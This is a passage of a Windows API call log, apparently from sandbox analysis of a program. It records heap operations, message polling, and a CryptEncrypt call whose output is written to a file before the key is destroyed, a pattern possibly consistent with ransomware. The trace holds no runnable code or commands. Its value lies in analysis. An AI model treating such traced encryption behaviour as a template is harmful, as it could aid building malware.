Flags=0x0, Size=0x8) returned 0x2a730c8 [0104.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0104.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0104.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0104.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0104.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0104.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0104.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0104.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0104.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0104.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0104.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0104.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0104.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0104.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0104.864] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0104.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0104.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0104.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0104.864] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0104.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0104.864] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0104.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0104.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0104.865] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0104.865] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a914e8 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0104.867] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0104.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0104.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0104.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9ee0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0104.868] CryptEncrypt (in: hKey=0x9a4580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x7be0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x7be8) returned 1 [0104.868] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.868] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.868] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.868] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.868] CharLowerBuffW (in: lpsz="byte[31720]", cchLength=0xb | out: lpsz="byte[31720]") returned 0xb [0104.868] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.869] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.869] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.869] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.869] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.869] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.869] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0104.869] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0104.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9dc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0104.870] CryptEncrypt (in: hKey=0x9a4580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a914e8*, pdwDataLen=0x8cef60*=0x7be0, dwBufLen=0x7be8 | out: pbData=0x2a914e8*, pdwDataLen=0x8cef60*=0x7be8) returned 1 [0104.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.871] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0104.871] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.871] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0104.871] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.871] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.871] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0104.871] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.871] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0104.871] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.871] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.871] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0104.871] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.872] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0104.872] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0104.872] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0104.872] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0104.872] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0104.872] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.872] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0104.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0104.875] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.875] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.875] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.875] WriteFile (in: hFile=0x458, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0x7be8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0x7be8, lpOverlapped=0x0) returned 1 [0104.876] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.876] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.876] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0104.876] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0104.876] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0104.877] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0104.877] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0104.877] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.877] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0104.877] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.877] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0105.008] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0105.008] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0105.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9940, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0105.008] CryptDestroyKey (hKey=0x9a4580) returned 1 [0105.008] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0105.008] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0105.009] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0105.009] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0105.009] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0105.009] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0105.009] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0105.009] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0105.009] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0105.009] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0105.009] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0105.009] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0105.009] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 